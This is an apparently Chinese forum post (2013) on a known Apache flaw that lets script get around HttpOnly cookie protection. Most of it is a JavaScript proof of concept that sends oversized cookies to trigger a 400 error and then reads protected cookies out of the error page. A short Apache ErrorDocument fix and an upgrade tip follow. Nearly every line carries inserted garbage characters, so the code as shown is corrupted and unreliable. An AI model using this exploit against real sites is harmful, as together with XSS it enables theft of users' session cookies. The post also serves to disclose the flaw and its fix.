很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。6 g" n1 _, z' m# m: F2 M3 Y
6 o: F4 `) u- [3 L6 t
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:8 K8 A; n5 Y8 X
- F8 F. Q9 ` ~
( m$ K; Y; N/ k, f5 D: ^/ K
// http://www.exploit-db.com/exploits/18442/# ~, v/ k: r+ n0 D( H
function setCookies (good) {
* `# E, B" Z; C// Construct string for cookie value" U% S! F4 h4 n# C
var str = "";) e2 E' F# F# M, D7 Y
for (var i=0; i< 819; i++) {. o0 N9 c3 h0 ~1 x, C
str += "x";; K- N! M& [/ y' |( X
}
0 l$ W8 F* N( [$ r2 R" g$ o// Set cookies
' R* I9 E( }" Y" }4 t" C! Qfor (i = 0; i < 10; i++) {
" O) e' Z i- W E6 G// Expire evil cookie" ~) k; x# p8 v
if (good) {
' w' v* Z& d7 Y) v8 n! E) zvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
0 W& t& r, C% L6 z}
# X+ e6 K/ }; {. V// Set evil cookie
+ {* G9 }3 \) E3 x4 h: Y& Velse {
1 r2 L" R$ F& \$ Lvar cookie = "xss"+i+"="+str+";path=/";
7 l7 \8 t6 S d$ \}: @8 y0 p7 N5 g- }+ M! j
document.cookie = cookie;( [2 H- N) K B
}
. B2 |* n& B; X/ N( u2 s2 E6 Y; x% \}/ D7 X3 J7 [5 C8 Z6 j' |
function makeRequest() {
# t$ `: B6 I+ V1 asetCookies();
$ J$ g' X! y6 t! \2 ^ h: v3 _function parseCookies () {
4 `3 J. ]8 ^, z! S, ], G( S* fvar cookie_dict = {};
9 L! G* O& f3 _; _ m9 Q" v0 Z& \// Only react on 400 status
4 U+ E O: L! r9 A. @) y/ q, Kif (xhr.readyState === 4 && xhr.status === 400) {, i: w5 d8 u$ b8 S k
// Replace newlines and match <pre> content* }& p; \# | `( L! T& P- G
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
4 u7 u2 |6 D) K5 i% `$ _% [- r4 U# m" ?if (content.length) {' ?6 y9 @4 W( v0 g
// Remove Cookie: prefix
F8 M6 d8 m: S bcontent = content[1].replace("Cookie: ", "");' j9 z4 |' g, D- {1 e+ T% V+ [
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);4 m# W' @2 j' |% ^; G. |" F9 E$ @& p
// Add cookies to object
( Y" _! a3 ]0 o+ Y) ^" G' a: c/ Ufor (var i=0; i<cookies.length; i++) {
4 w7 ^: J( c/ k: `2 ]- ]var s_c = cookies.split('=',2);9 d8 K! G( W/ b& k( i+ T
cookie_dict[s_c[0]] = s_c[1];
: F9 |% U: ]7 R/ Z/ b$ k}
9 ?( D- o% x5 P6 h}7 Z$ h6 F$ U! i, }4 p, o( b) M
// Unset malicious cookies
' R0 N' V C5 W! K# |' t+ XsetCookies(true); D a% S: ]' a7 r
alert(JSON.stringify(cookie_dict));+ z& H6 K3 j: h6 C7 H, k' X
}( `; |( J$ Z- Z- b
}) F5 l7 J9 @7 p; ]9 O2 G
// Make XHR request
& E# e, t) O2 C" Evar xhr = new XMLHttpRequest();1 b: }, G" n) A! b
xhr.onreadystatechange = parseCookies;
}! G4 r& _# Q) N W2 [0 Z2 q$ [) N3 Dxhr.open("GET", "/", true);
2 B j& i* n0 |9 Bxhr.send(null);
4 q/ U$ U( c4 r# q}/ l# Z3 F$ U0 v# T: `
makeRequest();
; X0 [/ P# L1 m9 q
W% a& S* l1 e6 }/ p5 k6 O你就能看见华丽丽的400错误包含着cookie信息。; e: x, Z/ R5 ]" Z+ T; F) c
' q% s; o" f) v( @7 F下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#: ~ D9 M8 W/ m
, k& f. B2 u/ W- j修复方案:' E" W* [- W( n+ t" _
, p' A: Z/ W+ V4 Q0 ]
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
" J1 P$ [3 u. ^2 U- W% R4 S$ G
: |" W8 E2 _) \In the event of a problem or error, Apachecan be configured to do one of four things,8 n. ]/ m# h$ O- n+ d6 u; G; K% B
$ V1 n, h, q! `) G
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息3 `; L# E, x3 C
2. output acustomized message输出一段信息
5 _5 N' c: _ k! B0 s& h3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 9 b) r9 Q4 H* k5 ?2 E# y
4. redirect to an external URL to handle theproblem/error转向一个外部URL
3 m( S+ R& t- U2 o+ D' l. j* c g0 @' x! r
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容& Z4 G3 w1 k3 \
- B, h& O* @! J1 w( C1 R1 f+ z- |" F
Apache配置:
0 ]7 x9 V2 x V& P8 }- {: I: X) I6 m5 z1 q3 [
ErrorDocument400 " security test"
' c& t% f& h! K- Z7 @6 L9 [8 i: c9 j' i" v
当然,升级apache到最新也可:)。, |# P7 D6 c4 {6 ?* w9 Z: w' X$ c
! [* P) s7 q2 B6 A* y9 z2 O; G
参考:http://httpd.apache.org/security/vulnerabilities_22.html/ G5 S4 I6 k% z& i+ | S# n9 @
' W+ T6 K2 P) j0 t |
发表于 2013-4-19 19:15:43
收藏
分享
支持
反对